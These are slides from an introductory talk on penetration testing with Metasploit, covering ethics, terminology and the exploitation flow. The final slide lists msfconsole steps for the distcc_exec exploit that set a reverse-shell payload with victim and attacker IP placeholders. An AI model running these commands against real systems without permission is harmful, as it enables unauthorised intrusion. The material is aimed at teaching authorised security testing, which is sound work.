3. Mohammed Danish Amber ▪ Geek & Security Analyst ▪ Information Security Enthusiast ▪ Working in TCS ▪ Lecturer & Engineer ▪ Collaborative Project -Hacker Ecosystem ▪ Make Internet a Secure Place
4. Why Pen-Testing ▪ Millions of dollars have been invested in security programs to protect critical infrastructure to prevent data breaches ▪ Penetration Test is one of the most effective ways to identify weaknesses and deficiencies in these programs
5. What's Pen-Testing ▪ A method to evaluate the security of computer system / network ▪ Practice ( attacking ) an IT System like a ‘hacker’ does– Find security holes (weaknesses) – Bypass security mechanism– Compromise an organization’s IT system securityMUST HAVE PERMISSION FROM IT SYSTEM OWNERILLEGAL ACTIVITY CAN PUT YOU IN JAIL!
6. ETHICS ▪ THINK BEFORE YOU ACT ▪ DON'T BE STUPID ▪ DON'T BE MALICIOUS
9. Metasploit ▪ Not Just A Tool but an entire framework ▪ An Open Source platform for writing security tools and exploits ▪ Easily build attack vectors to add it's exploits, payloads, encoders. ▪ Create and execute more advanced attack ▪ Ruby based
10. Metsaploit Interface ▪ MSFconsole ▪ msfweb, msfgui (discontinued) ▪ Metasploit Pro & Community Edition ▪ Armitage
13. Metasploit Terminology ▪ Exploit: Code that allow a pentester take some advantages of flaw within system,application, or service ▪ Payload: Code that we want the target system to execute (few commands to be executed on the target system) ▪ Shellcode: A set of instructions used as payload when exploitation occurs ▪ Module: A software that can be use by metasploit ▪ Listener: A component waiting for incoming connection
14. How does Exploitation works
Attacker
Sends: Exploit + PayloadUpload + download DATA
Vulnerable Server
Exploit run + Payload run
15. Meterpreter ▪ As a payload after vulnerability is exploited ▪ Improve the post exploitation
26. Ubuntu Exploitation ▪ search distcc ▪ use exploit/unix/misc/distcc_exec ▪ show payloads ▪ set PAYLOAD cmd/unix/reverse ▪ show options ▪ set rhost <victim ip> ▪ set lhost <attacker ip>